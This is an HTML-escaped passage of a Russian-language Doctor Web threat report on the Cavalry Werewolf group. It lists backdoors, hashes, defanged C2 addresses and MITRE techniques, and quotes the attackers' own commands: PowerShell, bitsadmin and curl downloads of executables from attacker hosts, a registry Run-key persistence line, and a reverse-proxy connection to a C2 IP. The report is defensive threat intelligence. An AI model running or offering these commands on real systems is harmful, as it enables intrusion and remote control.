                &lt;span class="string" style="white-space: pre-wrap;"&gt;Служебная записка от 12.08.2025&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
            &lt;/td&gt;
            &lt;td&gt;f546861adc7c8ca88e3b302d274e6fffb63de9b0&lt;/td&gt;
            &lt;td&gt;62[.]113.114[.]209&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;h3&gt;Последующие ступени заражения&lt;/h3&gt;
&lt;p&gt;Нами были обнаружены следующие вредоносные программы, которые могут в дальнейшем устанавливаться на зараженные устройства после компрометации:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.Inject5.57968&amp;lng=ru"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.ru/search/?q=BackDoor.ShellNET.2&amp;lng=ru"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.ru/search/?q=BackDoor.ReverseProxy.1&amp;lng=ru"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.Packed2.49862&amp;lng=ru"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Троянская программа с зашифрованным в ее теле бэкдором, который позволяет атакующим загружать вредоносные приложения на зараженный компьютер. Расшифровка полезной нагрузки выполняется в несколько шагов, на одном из которых вредоносный массив данных инжектируется в процесс приложения &lt;span class="string"&gt;aspnet_compiler.exe&lt;/span&gt; из пакета Microsoft .NET Framework. В дальнейшем полностью расшифрованный бэкдор работает в контексте процесса этого легитимного приложения.&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/october/cavalry_werewolf/02_vxcube_analysis.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/cavalry_werewolf/02_vxcube_analysis.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;Изучение активности &lt;b&gt;Trojan.Inject5.57968&lt;/b&gt; при помощи «песочницы» интерактивного анализатора угроз Dr.Web vxCube&lt;/em&gt;&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов Trojan.Inject5.57968&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Полезная нагрузка&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;pickmum1.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e840c521ec436915da71eb9b0cfd56990f4e53e5&lt;/td&gt;
            &lt;td&gt;64[.]95.11[.]202&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.PackedNET.3351&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;mummyfile1.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;22641dea0dbe58e71f93615c208610f79d661228&lt;/td&gt;
            &lt;td&gt;64[.]95.11[.]202&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.PackedNET.3351&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Бэкдор, который управляется через Telegram-бот и выполняет команды атакующих.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BackDoor.ShellNET.2&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;win.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;1957fb36537df5d1a29fb7383bc7cde00cd88c77&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Бэкдор на основе открытого ПО ReverseSocks5, запускающий обратный SOCS5-прокси в инфицированной системе для получения дистанционного доступа к компьютеру. &lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt; запускается через командную строку cmd.exe с параметром &lt;span class="string"&gt;-connect IP&lt;/span&gt; для подключения к нужному сетевому адресу. Известны модификации бэкдора с зашитыми адресами.&lt;/p&gt;
&lt;p&gt;Выявлены следующие IP:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;78[.]128.112[.]209&lt;/span&gt; (указывался в параметре запуска)&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;96[.]9.125[.]168&lt;/span&gt; (указывался в параметре запуска)&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;188[.]127.231[.]136&lt;/span&gt; (зашит в коде)&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;revv2.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;6ec8a10a71518563e012f4d24499b12586128c55&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt; — это троянские версии легитимных программ, в которые злоумышленники внедрили вредоносный код. Вирусные аналитики «Доктор Веб» встречали вредоносные модификации архиваторов WinRar и 7-Zip, средства разработки Visual Studio Code, текстового редактора AkelPad и ряда других приложений. Среди них, например, была программа Sumatra PDF Reader, которую киберпреступники выдавали за мессенджер MAX. Такие модификации перестают выполнять основную функциональность и при запуске инициализируют только добавленную к ним троянскую часть.&lt;/p&gt;
&lt;p&gt;В зависимости от целей киберпреступников в этих модификациях могут скрываться самые разные вредоносные программы. Среди них:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.ru/search/?q=BackDoor.ReverseProxy.1&amp;lng=ru"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt; (&lt;a href="https://github.com/Acebond/ReverseSocks5" target="_blank"&gt;ReverseSocks5&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Shell.275&lt;/b&gt; (&lt;a href="https://github.com/Adaptix-Framework/AdaptixC2" target="_blank"&gt;AdaptixC2&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt; (&lt;a href="https://github.com/Adaptix-Framework/AdaptixC2" target="_blank"&gt;AdaptixC2&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt; (&lt;a href="https://github.com/HavocFramework/Havoc" target="_blank"&gt;Havoc&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Meterpreter.227&lt;/b&gt; (CobaltStrike)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Siggen9.56514&lt;/b&gt; (AsyncRAT)&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.Clipper.808&amp;lng=ru"&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов Trojan.Packed2.49862&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Полезная нагрузка&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;code.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;rev2.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;8279ad4a8ad20bf7bbca0fc54428d6cdc136b776&lt;/td&gt;
            &lt;td&gt;188[.]127.231[.]136&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;code.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;revv.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;a2326011368d994e99509388cb3dc132d7c2053f&lt;/td&gt;
            &lt;td&gt;192[.]168.11[.]10&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7zr.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;winload.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;system.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Recorded_TV.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;451cfa10538bc572d9fd3d09758eb945ac1b9437&lt;/td&gt;
            &lt;td&gt;77[.]232.42[.]107&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Shell.275&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;Command line RAR&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;winlock.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Recorded_TV.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2&lt;/td&gt;
            &lt;td&gt;77[.]232.42[.]107&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;winsrv.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;firefox.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;bbe3a5ef79e996d9411c8320b879c5e31369921e&lt;/td&gt;
            &lt;td&gt;94[.]198.52[.]210&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;AkelPad.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e8ab26b3141fbb410522b2cbabdc7e00a9a55251&lt;/td&gt;
            &lt;td&gt;78[.]128.112[.]209&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;dcd374105a5542ef5100f6034c805878153b1205&lt;/td&gt;
            &lt;td&gt;192[.]168.88[.]104&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Meterpreter.227&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e51a65f50b8bb3abf1b7f2f9217a24acfb3de618&lt;/td&gt;
            &lt;td&gt;192[.]168.1[.]157&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Siggen9.56514&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;chromedriver.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4&lt;/td&gt;
            &lt;td&gt;Telegram-бот&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7z&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;svc_host.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;dzveo09ww.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81&lt;/td&gt;
            &lt;td&gt;Telegram-бот&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;—&lt;/td&gt;
            &lt;td&gt;b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5&lt;/td&gt;
            &lt;td&gt;Telegram-бот&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;max - для бизнеса.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231 &lt;/td&gt;
            &lt;td&gt;89[.]22.161[.]133&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;h3&gt;Характерные для группировки действия внутри скомпрометированной сети&lt;/h3&gt;
&lt;p&gt;После проникновения в компьютерную инфраструктуру целевой организации злоумышленники могут выполнять различные действия по сбору данных и дальнейшему закреплению в системе.&lt;/p&gt;
&lt;p&gt;Для получения информации о зараженном компьютере запускают команды:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;whoami&lt;/span&gt; — получить сведения о текущем пользователе;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;dir C:\\users\\&amp;lt;user&amp;gt;\\Downloads&lt;/span&gt; — получить список файлов в каталоге «Загрузки» текущего пользователя;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;dir C:\\users\\public\\pictures\\&lt;/span&gt; — получить список файлов в каталоге «Изображения» из общей директории (с целью определить какие вредоносные программы уже были загружены в систему);&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;ipconfig /all&lt;/span&gt; — получить конфигурацию сети;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;net user&lt;/span&gt; — получить список всех пользователей в системе.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для сбора информации о прокси-сервере и для проверки работоспособности сети используют команды:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy(\"https://google.com\")'&lt;/span&gt;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;curl -I https://google.com&lt;/span&gt;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;curl -I https://google.com -x &amp;lt;proxy&amp;gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для настройки параметров сети используют:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;утилиту командной строки &lt;span class="string"&gt;netsh&lt;/span&gt;, входящую в состав ОС Windows.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для последующей доставки вредоносных инструментов в систему используют легитимные инструменты:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;PowerShell (например: &lt;span class="string"&gt;powershell -Command Invoke-WebRequest -Uri \"hxxps[:]//sss[.]qwadx[.]com/revv3.exe\" -OutFile \"C:\\users\\public\\pictures\\rev.exe&lt;/span&gt;);&lt;/li&gt;
    &lt;li&gt;Bitsadmin (например: &lt;span class="string"&gt;bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\\users\\public\\pictures\\rev3.exe&lt;/span&gt;);&lt;/li&gt;
    &lt;li&gt;curl (например: &lt;span class="string"&gt;curl -o C:\\users\\public\\pictures\\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe&lt;/span&gt;);&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для закрепления в системе:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;Могут модифицировать системный реестр Windows (например: &lt;span class="string"&gt;REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Service /t REG_SZ /d C:\\users\\public\\pictures\\win.exe /f&lt;/span&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для запуска своих инструментов используют командный интерпретатор cmd.exe. Например:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;C:\\users\\public\\libraries\\revv2.exe -connect 78[.]128.112[.]209:10443&lt;/span&gt; — для запуска &lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;C:\\users\\public\\pictures\\732.exe&lt;/span&gt;  — для запуска &lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для удаления инструментов могут использовать PowerShell. Например:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Злоумышленники также могут периодически проверять доступность С2-серверов через команду &lt;span class="string"&gt;ping&lt;/span&gt;.&lt;/p&gt;
&lt;h3&gt;Особенности группировки Cavalry Werewolf&lt;/h3&gt;
&lt;p&gt;Можно выделить следующие особенности злоумышленников из группировки Cavalry Werewolf:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;предпочитают использовать ПО с открытым кодом — как в исходном виде, так и в качестве основы для собственных разработок;&lt;/li&gt;
    &lt;li&gt;основными инструментами являются различные бэкдоры с функциональностью обратного шелла, позволяющие дистанционно выполнять команды в зараженных системах;&lt;/li&gt;
    &lt;li&gt;с целью сокрытия могут встраивать вредоносный код в изначально безобидные приложения;&lt;/li&gt;
    &lt;li&gt;часто применяют Telegram API для управления зараженными компьютерами;&lt;/li&gt;
    &lt;li&gt;для распространения первой ступени заражения проводят фишинговые рассылки якобы от имени государственных структур и используют для этого скомпрометированные email-адреса;&lt;/li&gt;
    &lt;li&gt;для загрузки последующих стадий заражения на целевое устройство используют директории &lt;span class="string"&gt;C:\\users\\public\\pictures&lt;/span&gt;, &lt;span class="string"&gt;C:\\users\\public\\libraries&lt;/span&gt;, &lt;span class="string"&gt;C:\\users\\public\\downloads&lt;/span&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Подробные технические описания выявленных инструментов Cavalry Werewolf находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».&lt;/p&gt;
&lt;p&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=BackDoor.ReverseProxy.1&amp;lng=ru"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=BackDoor.ReverseShell.10&amp;lng=ru"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=BackDoor.RShell.169&amp;lng=ru"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=BackDoor.ShellNET.1&amp;lng=ru"&gt;&lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=BackDoor.ShellNET.2&amp;lng=ru"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=BackDoor.Siggen2.5463&amp;lng=ru"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=BackDoor.Tunnel.41&amp;lng=ru"&gt;&lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=BAT.DownLoader.1138&amp;lng=ru"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Trojan.Siggen31.54011&amp;lng=ru"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Trojan.Clipper.808&amp;lng=ru"&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Trojan.FileSpyNET.5&amp;lng=ru"&gt;&lt;b&gt;Trojan.FileSpyNET.5&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Trojan.Inject5.57968&amp;lng=ru"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Trojan.Packed2.49708&amp;lng=ru"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Trojan.Packed2.49862&amp;lng=ru"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;h3&gt;Матрица MITRE&lt;/h3&gt;

&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Этап&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Техника&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;Первоначальный доступ&lt;/td&gt;
            &lt;td&gt;Целевой фишинг с вложением (T1566.001)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Выполнение&lt;/td&gt;
            &lt;td&gt;Выполнение с участием пользователя (T1204)&lt;br /&gt;&lt;br /&gt;PowerShell (T1059.001)&lt;br /&gt;&lt;br /&gt;Командная оболочка Windows (T1059.003)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Закрепление&lt;/td&gt;
            &lt;td&gt;Ключи запуска в реестре Windows / Каталог автозагрузки (T1547.001)&lt;br /&gt;&lt;br /&gt;BITS-задачи (T1197)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Повышение привилегий&lt;/td&gt;
            &lt;td&gt;Обход контроля учетных записей (T1548.002)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Предотвращение обнаружения&lt;/td&gt;
            &lt;td&gt;BITS-задачи (T1197)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Организация управления&lt;/td&gt;
            &lt;td&gt;Внешний прокси-сервер (T1090.002)&lt;br /&gt;&lt;br /&gt;Двусторонняя связь (T1102.002)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Эксфильтрация данных&lt;/td&gt;
            &lt;td&gt;Эксфильтрация по каналу управления (T1041)&lt;br /&gt;&lt;br /&gt;Эксфильтрация через веб-службу (T1567)&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Cavalry%20Werewolf/README.adoc" target="_blank"&gt;Индикаторы компрометации&lt;/a&gt;</description></item></channel></rss>
